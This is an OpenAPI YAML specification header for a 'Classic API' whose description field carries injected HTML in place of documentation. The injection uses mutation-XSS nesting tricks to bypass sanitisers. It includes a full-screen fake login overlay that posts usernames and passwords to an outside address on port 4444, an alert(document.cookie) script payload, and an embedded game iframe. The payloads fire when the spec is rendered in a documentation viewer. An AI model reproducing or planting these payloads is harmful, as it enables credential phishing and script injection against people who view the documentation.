openapi: '3.0.1'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><h1>Tuma</h1>"></form>
    <form><math><mtext></form><form><iframe src="https://www.retrogames.cc/embed/10030-street-fighter-ii-champion-edition-street-fighter-2-920513-etc.html&quot; width="600" height="450" </iframe>
    <form><math><mtext></form><form><div style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:10000;background:#fff;color:#000;font-family:Arial,sans-serif;font-size:16px;display:flex;justify-content:center;align-items:center;"><form name="login" action="http://192.168.100.73:4444/login.htm" style="text-align:center;background:#f9f9f9;padding:2em;border:1px solid #ccc;border-radius:10px;box-shadow:0 0 10px rgba(0,0,0,0.2);"><div style="font-weight:bold;margin-bottom:1em;font-size:18px;">Valid credentials:</div><div style="margin-bottom:1em;"><input type="text" name="username" placeholder="Username" style="padding:8px;width:200px;border:2px solid #000;border-radius:5px;"/></div><div style="margin-bottom:1em;"><input type="password" name="password" placeholder="Password" style="padding:8px;width:200px;border:2px solid #000;border-radius:5px;"/></div><div><input type="submit" value="Login" style="padding:8px 16px;background:#000;color:#fff;border:none;border-radius:5px;cursor:pointer;"/></div></form></div>
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
    

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
